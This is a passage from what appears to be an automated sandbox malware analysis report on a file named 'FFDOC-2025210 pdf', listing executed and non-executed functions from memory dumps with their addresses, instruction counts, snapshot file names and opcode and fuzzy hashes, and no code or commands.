                                • Opcode ID: f44d3293e7fe363700f026fbe59f9b2b68bdd97e0c5fd91b2142787a3f44d482
                                • Instruction ID: 764735383f684ac0ea10e1fb3eb673ed077db0e136534a714fbb14d9f89a70c4
                                • Opcode Fuzzy Hash: f44d3293e7fe363700f026fbe59f9b2b68bdd97e0c5fd91b2142787a3f44d482
                                • Instruction Fuzzy Hash: 73F08C71A042088FEB14CF28D48879A7BE2F790310F2C80A5D00CCBA58D770EA818B40
                                Function 00871789 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 947936c79952d0047e4f1e21db970ae4af409fb1a2ee31ce8d2a10284f69eed5
                                • Instruction ID: 048a13eabadf77b3f93068c249caa1d848e98accf901cffa82c71bf716e92e12
                                • Opcode Fuzzy Hash: 947936c79952d0047e4f1e21db970ae4af409fb1a2ee31ce8d2a10284f69eed5
                                • Instruction Fuzzy Hash: 55F0F63291014D8BDF159B64C8296EFBFA6AF44301F14842AC016AB395DEB45907C7D2
                                Function 00872228 Relevance: .0, Instructions: 36COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 40c5da999aacb75ac5b06ee51932d1c8148e6253bf2c43723def15aed82a26e2
                                • Instruction ID: eb368440450957638d5bec4400fcc5ee0325da6dfbc0e7ca852942aa6fa03593
                                • Opcode Fuzzy Hash: 40c5da999aacb75ac5b06ee51932d1c8148e6253bf2c43723def15aed82a26e2
                                • Instruction Fuzzy Hash: 55F0C23291418A4BDF158B64C865AEEBFB1AF84300F05896AC052B7392DE709517CB81
                                Function 00871BF0 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e173d36c001f49545db92ac5cac2c6f86843c165cb8e5353139d2bc78eea27e9
                                • Instruction ID: 98607cb44f2eae751d212c336f7373b349064841c6474fe04ecbf2d7fb56e684
                                • Opcode Fuzzy Hash: e173d36c001f49545db92ac5cac2c6f86843c165cb8e5353139d2bc78eea27e9
                                • Instruction Fuzzy Hash: 1CF04C319001495BDF16DBA4C8695EFFFB1AF45300F048426C412EB395DF745816C7C2
                                Function 06046DF4 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1b1adc5d575d0fcbcd914e16ca50bde8a89105413b0bb4ccd8a04e62d5411985
                                • Instruction ID: e074cb908fcd6e37e1b36ed66aa7a243a4aab3d1c94fcd7250c7e321af159373
                                • Opcode Fuzzy Hash: 1b1adc5d575d0fcbcd914e16ca50bde8a89105413b0bb4ccd8a04e62d5411985
                                • Instruction Fuzzy Hash: 18119674A041299FC768EF18D895ADDBBF5FF88300F5080E5A90AE7354DB745E848F52
                                Function 00871798 Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3be4c053ba5e1d145f26296dcf818723cead54268f5df59e6316ddf0dbb67c9c
                                • Instruction ID: 72c3b91a37a6423ec548f4e5c6c90d534f0737884e82879a8060ea01f07f8700
                                • Opcode Fuzzy Hash: 3be4c053ba5e1d145f26296dcf818723cead54268f5df59e6316ddf0dbb67c9c
                                • Instruction Fuzzy Hash: 06F0E232E1010D9BDF19DB64C4199EFBBBAAF88300F04843AC012BB394DEB4690786D2
                                Function 0604732E Relevance: .0, Instructions: 33COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 54a69b36a30dfd41b1e380b245cc1d03f7a377c3d02d2c81afc3bea658f78c45
                                • Instruction ID: b138507076e64d2e9defe3877bdb9efe7dc85e0f9e55ee6bb0d682fb4877ac20
                                • Opcode Fuzzy Hash: 54a69b36a30dfd41b1e380b245cc1d03f7a377c3d02d2c81afc3bea658f78c45
                                • Instruction Fuzzy Hash: 2B01F374900268CFCB64DF18D8546D9BBF5FF49305F1080E9D849A7250DA385E85CF81
                                Function 00870860 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7d57ae5e16f3f7ab99dc0048bd7a5b9b8f23e85a996399b74c7b4e750aa271ba
                                • Instruction ID: 311589b4390b9873cff8862384cf308d81b0f17ddfdd2759bf211caf97dd6107
                                • Opcode Fuzzy Hash: 7d57ae5e16f3f7ab99dc0048bd7a5b9b8f23e85a996399b74c7b4e750aa271ba
                                • Instruction Fuzzy Hash: DAD09E5848D6C05FDB031B2468A57E53FB0AB1700AF0820D6D4D58B533C0644057DB35
                                Function 0605DEC0 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f3994ea87208f73c227b45aa969eceb70fecc2c45e8a9c72578709adaf263f0
                                • Instruction ID: 5448269c88f991270312edb2139217576a911d028c250c7d071eccb7332109f8
                                • Opcode Fuzzy Hash: 3f3994ea87208f73c227b45aa969eceb70fecc2c45e8a9c72578709adaf263f0
                                • Instruction Fuzzy Hash: F7E0C974D05208EFCB84EFA8D5406ADFBF5EB58310F10C0AA9C18A3351D6319A51DF84
                                Function 06055F70 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f3994ea87208f73c227b45aa969eceb70fecc2c45e8a9c72578709adaf263f0
                                • Instruction ID: fbf1f3001507295af506bf3f8f676dce972f66fd4f0b7161da5af5f56b5955b2
                                • Opcode Fuzzy Hash: 3f3994ea87208f73c227b45aa969eceb70fecc2c45e8a9c72578709adaf263f0
                                • Instruction Fuzzy Hash: A7E0E574E45208EFCB85DFA8D940AADFBF4EB48310F10C0AA9C18A3351D6329A52DF80
                                Function 0605D7D8 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f3994ea87208f73c227b45aa969eceb70fecc2c45e8a9c72578709adaf263f0
                                • Instruction ID: 421c3e5134a9c3844163b8b4d3ab7a93184df4b1e94c1b74c8a450b2cb0e5377
                                • Opcode Fuzzy Hash: 3f3994ea87208f73c227b45aa969eceb70fecc2c45e8a9c72578709adaf263f0
                                • Instruction Fuzzy Hash: EFE0C974D05208EFCB94DFA8D94069DBBF4EB48310F10C0AA9C0993351D6319A51DF84
                                Function 0605A7F0 Relevance: .0, Instructions: 23COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f3994ea87208f73c227b45aa969eceb70fecc2c45e8a9c72578709adaf263f0
                                • Instruction ID: 922d55b63141156bc6aaa1b0809d424dad6561944fbfb75525faf2ac0723473b
                                • Opcode Fuzzy Hash: 3f3994ea87208f73c227b45aa969eceb70fecc2c45e8a9c72578709adaf263f0
                                • Instruction Fuzzy Hash: 4CE0C974E05208EFCB84DFA8D5446ADBBF4EB48310F10C1A99C1893351D6719E52DF81
                                Function 0605FE40 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 398728e47aeb70877eb42255ff27be22f136d279568b09cbfa91bae4a9237650
                                • Instruction ID: 87f6c4a4183074a54d44b5590ac98bc8b50ff8f0c09b8ac0309227f3d4b0d35d
                                • Opcode Fuzzy Hash: 398728e47aeb70877eb42255ff27be22f136d279568b09cbfa91bae4a9237650
                                • Instruction Fuzzy Hash: F0E0E574E05208EFCB84DFA8D5406ADBBF4EB48304F10C0A9981893342E6359A42DF80
                                Function 0605F898 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 398728e47aeb70877eb42255ff27be22f136d279568b09cbfa91bae4a9237650
                                • Instruction ID: 3d469183626e67552183edda91e131a18963004f8c8ab8fb2e0dcde1b7dd0d11
                                • Opcode Fuzzy Hash: 398728e47aeb70877eb42255ff27be22f136d279568b09cbfa91bae4a9237650
                                • Instruction Fuzzy Hash: A6E0E574E05208EFCB84DFA9D5406ADBBF4EB48300F10C0A99C0893341D6759A42CF81
                                Function 06041735 Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ecfb4d0662d43717889c0e9a847960828a5e591957b42854a3b41f30b28cf87c
                                • Instruction ID: e95dc933597654a6f9fd23bf20da6157182c7d1d989be6d098e2ad296557a3fd
                                • Opcode Fuzzy Hash: ecfb4d0662d43717889c0e9a847960828a5e591957b42854a3b41f30b28cf87c
                                • Instruction Fuzzy Hash: 11F03470940229CFEBB4AF14D885B99BAF4FB08304F1080E9D61AA7644DB344AC8CF81
                                Function 06058D50 Relevance: .0, Instructions: 20COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 85aec7834f4fc81074588a61cacd17387093d31de3ad16339461d9f95f7f3338
                                • Instruction ID: 363423b42ce0f13607406a8ecbc27dcdc6832abbd7ed418f6a29565ee9500b6e
                                • Opcode Fuzzy Hash: 85aec7834f4fc81074588a61cacd17387093d31de3ad16339461d9f95f7f3338
                                • Instruction Fuzzy Hash: 8DE01A34D05118EFCB94DB99D5405ACBBF4AB48200F10C0AA9C5853341D6369A42DB90
                                Function 0087FE98 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b23e5cac8cb8992595501ceec8bd67db1504eb5c628c36357c38c7cead0a3051
                                • Instruction ID: 69d971ff7750af30a6f555660a813944e21ede588188c36dc4a95e6bfed53eae
                                • Opcode Fuzzy Hash: b23e5cac8cb8992595501ceec8bd67db1504eb5c628c36357c38c7cead0a3051
                                • Instruction Fuzzy Hash: DCE0C231802208EFC701EFB4D90869E7BB9EB09311F4084A6D10993221EF754E10E791
                                Function 0605E600 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a409fa240fb2247171d808cb0a4e9175e5560aa31dac43a3b4b1e41d72a88a9e
                                • Instruction ID: 5be81ace25004b17109e7edfa50104a7c11da669296d13c66288c73c6697bd1c
                                • Opcode Fuzzy Hash: a409fa240fb2247171d808cb0a4e9175e5560aa31dac43a3b4b1e41d72a88a9e
                                • Instruction Fuzzy Hash: B2E0C234D0A208DFCB48DF94E9405ADBFB4EB45341F10C0A8CC0813341CA329E42CB80
                                Function 0605B640 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a9db7e422545bb87862cedcc219354046f15dcda0adadbd4c79e1754c1cd0637
                                • Instruction ID: 4a52ec4a2938afcf29ecd045f9700b2cf1faad29affb65d76d7997dc72088056
                                • Opcode Fuzzy Hash: a9db7e422545bb87862cedcc219354046f15dcda0adadbd4c79e1754c1cd0637
                                • Instruction Fuzzy Hash: A0E0C230942208EFCB40FBB49948A9E7BF99B45200F0044A5C50493220EE365A10E792
                                Function 008734F0 Relevance: .0, Instructions: 18COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b8c2c66757f013b14fbc2e759dce4187dc64f6892df188cdc9f62e1d73a530b8
                                • Instruction ID: 2664da0f9afdc49996440cde473ca14787d638fca10f45fcbd9eb64382a90d11
                                • Opcode Fuzzy Hash: b8c2c66757f013b14fbc2e759dce4187dc64f6892df188cdc9f62e1d73a530b8
                                • Instruction Fuzzy Hash: 8FE05E3469D3D44FCB029778A864DA93FF55E4B11430A01DFE48ACF6B3C6A58C05CB92
                                Function 00873500 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e8277c88c3d5eedda1aa844becb955e25cf5270468fa6c90c6a0633c3a063791
                                • Instruction ID: 1ad834013ca7ddc1b6f81c7d84287a54438df34407388acf6c063c09377dffa5
                                • Opcode Fuzzy Hash: e8277c88c3d5eedda1aa844becb955e25cf5270468fa6c90c6a0633c3a063791
                                • Instruction Fuzzy Hash: 89C08C313102248FC700A66DD40088633ED9F8A62430000A6F109CB330DEA2EC0187D1
                                Function 00870F96 Relevance: .0, Instructions: 11COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 84b2e9417af75d4b403cd4e64972aba77dfdc4b599f7898e3edb007096e71145
                                • Instruction ID: 8ee44e2f5142c927bbe228ccdca5c3e73915a8a02083ea12b9fa3fb0ff7dd89c
                                • Opcode Fuzzy Hash: 84b2e9417af75d4b403cd4e64972aba77dfdc4b599f7898e3edb007096e71145
                                • Instruction Fuzzy Hash: 5ED09235915510CAEB54AF16DC09A6B73F0FB08325F4AC4B8C94EEB619C374E8458E96
                                Function 0087128B Relevance: .0, Instructions: 11COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6917c319394280e6104905767e5c1b6cca0a06911be187ceea6f4b180f475f38
                                • Instruction ID: 0ba439beab9062275018d5f9ad093e85418519468ea5f70d9bec381b8f684392
                                • Opcode Fuzzy Hash: 6917c319394280e6104905767e5c1b6cca0a06911be187ceea6f4b180f475f38
                                • Instruction Fuzzy Hash: 1CD0C932905455CAEB688F1ADC0815EB3F6FB48315316C8B9CA4AE7129D770ED868E92
                                Function 0087FD00 Relevance: .0, Instructions: 11COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2405a5c03ddeae0b1698bf6ac1830474950d99c71014bd42ae4cbbae6d83150f
                                • Instruction ID: 412f07f0a8df2fb020bbb777c78436d6a11f1006d6caa4d622b3e44edea3bd62
                                • Opcode Fuzzy Hash: 2405a5c03ddeae0b1698bf6ac1830474950d99c71014bd42ae4cbbae6d83150f
                                • Instruction Fuzzy Hash: 1DC08C210036048ACA6477E8790D3283658EB00322F408020E20CC12534F78D890C3BB
                                Function 00870890 Relevance: .0, Instructions: 5COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 62827c454f6eeeeaf05e402bc8df8c7a3260942a6139bd87f63991223d9f666e
                                • Instruction ID: 6fa954040a03661600120f35de0cf082cdee382b4ae90f32984994a2adbdfdf4
                                • Opcode Fuzzy Hash: 62827c454f6eeeeaf05e402bc8df8c7a3260942a6139bd87f63991223d9f666e
                                • Instruction Fuzzy Hash: 87900231085A0C9B45503795790D556779CA6485157844061A50D455255AA564118595

                                Non-executed Functions

                                Function 0087C2A0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4']q$4']q
                                • API String ID: 0-3120983240
                                • Opcode ID: 25e80cf499e1bd1709553ca1672d64062fa2b336793d56affe346dd4800ee5f3
                                • Instruction ID: b9bd9e2d318246f7f8746b504789df1fd6fb9ab7a0539373fe0fbf09306b474b
                                • Opcode Fuzzy Hash: 25e80cf499e1bd1709553ca1672d64062fa2b336793d56affe346dd4800ee5f3
                                • Instruction Fuzzy Hash: 09712B70A016058FD70CEF6AE94569EBBF7FFC9300F04C469D009AB269EBB49906CB55
                                Function 06040040 Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID: C$U
                                • API String ID: 0-1735700054
                                • Opcode ID: 303b03c70ede6fe46c88a1653144497c95ac7306beeb08d62ed2f9b9140251f3
                                • Instruction ID: ecd04952b189acd2a5096081523b29d30712d75cf958184cd05f25f5d8c207be
                                • Opcode Fuzzy Hash: 303b03c70ede6fe46c88a1653144497c95ac7306beeb08d62ed2f9b9140251f3
                                • Instruction Fuzzy Hash: 0741EAB0D44629CBEB78DF2AC85879DBAF6AF88304F00C1FA851DA6255DB740AC5CF41
                                Function 0605E640 Relevance: .2, Instructions: 210COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8931fe4d58348931898b4e89c9a3acf64ea0019a235cd8f52da8651961e0e045
                                • Instruction ID: 07784a0e3d8162cce2e7f505aa14de1b942a684c711211840509a39281f54316
                                • Opcode Fuzzy Hash: 8931fe4d58348931898b4e89c9a3acf64ea0019a235cd8f52da8651961e0e045
                                • Instruction Fuzzy Hash: 16910870E45229CFEBA4DF65C844BAEBBF1FF49300F1280A9C949A7241EB745A85CF41
                                Function 0087C828 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2191863483.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_870000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a5a5757b779bc976051e8450515b46d7eedd4b85fdf02dddc52524447fb0f747
                                • Instruction ID: 24c36b926f69c63275d1f9f9f9c5358fd41f38a936b313cbf2bf7667ccd858d8
                                • Opcode Fuzzy Hash: a5a5757b779bc976051e8450515b46d7eedd4b85fdf02dddc52524447fb0f747
                                • Instruction Fuzzy Hash: 605194B4D056188FEB68DF6AD95878ABBF2FF88300F14C1A9D40DA7264DB704A85CF40
                                Function 06040028 Relevance: .1, Instructions: 66COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2211968168.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6040000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0418486832bb11bf0dae37db519f4c59732b80dba4101a7613752a0076c1dd3f
                                • Instruction ID: bdfeba4422450e3324c8ab72d7ee17ef24989b0fe64765c63038ca28187aa854
                                • Opcode Fuzzy Hash: 0418486832bb11bf0dae37db519f4c59732b80dba4101a7613752a0076c1dd3f
                                • Instruction Fuzzy Hash: F921E8B1D046658BEB69CF2B884479ABAF3AFC5300F04C0FA844DA6625EB7409868F11

                                Executed Functions

                                Function 00F808E0 Relevance: .2, Instructions: 189COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.3310993641.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_f80000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 894df4cd79ebe52f23a5092e946b1c963489e7d9a37a292951aa8f83edb95eb3
                                • Instruction ID: d48284c76523025b3f33c717b25607ccc023ddb1e374623c700cb4f55131f57f
                                • Opcode Fuzzy Hash: 894df4cd79ebe52f23a5092e946b1c963489e7d9a37a292951aa8f83edb95eb3
                                • Instruction Fuzzy Hash: 63619F357002098FCB09EF78E958AAE7BA6FF88305B118529D40ADB3A5DF349D05DB91
                                Function 00F808CF Relevance: .1, Instructions: 104COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.3310993641.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_f80000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 30f42345e3c1adc6ecdcad448d15b3cc118cf285391d28cba68a53513210b270
                                • Instruction ID: 618ce591047e5320b625718872e5a215087586cf76c5e79148b58944043b5764
                                • Opcode Fuzzy Hash: 30f42345e3c1adc6ecdcad448d15b3cc118cf285391d28cba68a53513210b270
                                • Instruction Fuzzy Hash: DF4182756002098FCB09FF78E9589AE7BA6FF843057028539C41ACB6A5DF349D09DB91
                                Function 00F80A98 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.3310993641.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_f80000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4ab3455f383987549cedefe6e33aa4fc766cd1790a1b959a18a1556c617bceff
                                • Instruction ID: f29ff3c8c47e464f82246d2e571963f701e549d0f6557817b4616f35f4a24ee1
                                • Opcode Fuzzy Hash: 4ab3455f383987549cedefe6e33aa4fc766cd1790a1b959a18a1556c617bceff
                                • Instruction Fuzzy Hash: BB31CC34B001059FDB14DB78D855B6EBBF2FF89700F2484A8E406EF3A6CA719C028B91
                                Function 00F81038 Relevance: .1, Instructions: 79COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.3310993641.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_f80000_FFDOC-2025210 pdf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5781c2f2138fb76b2cc2d4edc1dfb4ee2f5fbe360ec1de25277837b6b510a005
                                • Instruction ID: bb7bf32c25f7754bc4ca17ef82eb31b810a036fa33fd1e7907b89a82e378634d
                                • Opcode Fuzzy Hash: 5781c2f2138fb76b2cc2d4edc1dfb4ee2f5fbe360ec1de25277837b6b510a005
                                • Instruction Fuzzy Hash: 6E219271B002064FCB44AFBE58557AFBAEEEFC5310B14882DD44BD7796DD38890687A2
                                Function 00F80F19 Relevance: .1, Instructions: 77COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000002.00000002.3310993641.0000000000F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
